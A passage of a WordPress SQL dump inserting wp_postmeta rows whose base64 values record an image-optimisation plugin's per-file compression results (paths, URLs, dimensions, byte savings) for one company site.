ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU3NjAxOCwiaWQiOjEwOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTMsInRpbWUiOjE0ODM1NzYwMjEsImlkIjoxMDk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTgwLCJ0aW1lIjoxNDgzNTc2MDI0LCJpZCI6MTA5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE3MDMsInRpbWUiOjE0ODM1NzYwMjksImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MjIsInRpbWUiOjE0ODM1NzYwMzIsImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1NDMsInRpbWUiOjE0ODM1NzYwMzUsImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2MDgsInRpbWUiOjE0ODM1NzYwMzksImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo5MTQsInRpbWUiOjE0ODM1NzYwNDIsImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NzMsInRpbWUiOjE0ODM1NzYwNDYsImlkIjoxMDk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMzA1LCJ0aW1lIjoxNDgzNTc2MDUwLCJpZCI6MTA5OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29752, 1095, 'wpfc_optimisation_reduction', '13324'); 
INSERT INTO `wp_postmeta` VALUES (29753, 1095, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLmpwZyIsIndpZHRoIjo2MDE2LCJoZWlnaHQiOjM5MTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzYwNTQsImlkIjoiMTA5NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MzMsInRpbWUiOjE0ODM1NzYwNTgsImlkIjoxMDk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS04MDB4NTIxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTIxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS04MDB4NTIxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS04MDB4NTIxLmpwZyIsInJlZHVjdGlvbiI6MTE5MywidGltZSI6MTQ4MzU3NjA2MiwiaWQiOjEwOTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTc2OHg1MDAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTc2OHg1MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTc2OHg1MDAuanBnIiwicmVkdWN0aW9uIjoxMTIzLCJ0aW1lIjoxNDgzNTc2MDY2LCJpZCI6MTA5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BQk9VVC1NaWxsZXItc3RlcGhlbnNvbi0tMTYwMHgxMDQxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTE2MDB4MTA0MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BQk9VVC1NaWxsZXItc3RlcGhlbnNvbi0tMTYwMHgxMDQxLmpwZyIsInJlZHVjdGlvbiI6Mzg5NSwidGltZSI6MTQ4MzU3NjA3MSwiaWQiOjEwOTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODUsInRpbWUiOjE0ODM1NzYwNzQsImlkIjoxMDk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDgwLCJ0aW1lIjoxNDgzNTc2MDc3LCJpZCI6MTA5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BQk9VVC1NaWxsZXItc3RlcGhlbnNvbi0tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BQk9VVC1NaWxsZXItc3RlcGhlbnNvbi0tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BQk9VVC1NaWxsZXItc3RlcGhlbnNvbi0tMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUxMSwidGltZSI6MTQ4MzU3NjA4MSwiaWQiOjEwOTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQUJPVVQtTWlsbGVyLXN0ZXBoZW5zb24tLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDg2LCJ0aW1lIjoxNDgzNTc2MDg0LCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDM0LCJ0aW1lIjoxNDgzNTc2MDg4LCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDU5LCJ0aW1lIjoxNDgzNTc2MDkxLCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTE2LCJ0aW1lIjoxNDgzNTc2MDk0LCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjkxLCJ0aW1lIjoxNDgzNTc2MDk4LCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Nzg1LCJ0aW1lIjoxNDgzNTc2MTAyLCJpZCI6MTA5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FCT1VULU1pbGxlci1zdGVwaGVuc29uLS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTMzLCJ0aW1lIjoxNDgzNTc2MTA1LCJpZCI6MTA5NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29754, 1091, 'wpfc_optimisation_reduction', '12674'); 
INSERT INTO `wp_postmeta` VALUES (29755, 1091, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1zZXJpZXMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLXNlcmllcy5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc2MTEwLCJpZCI6IjEwOTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtc2VyaWVzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1zZXJpZXMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLXNlcmllcy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjYxLCJ0aW1lIjoxNDgzNTc2MTE0L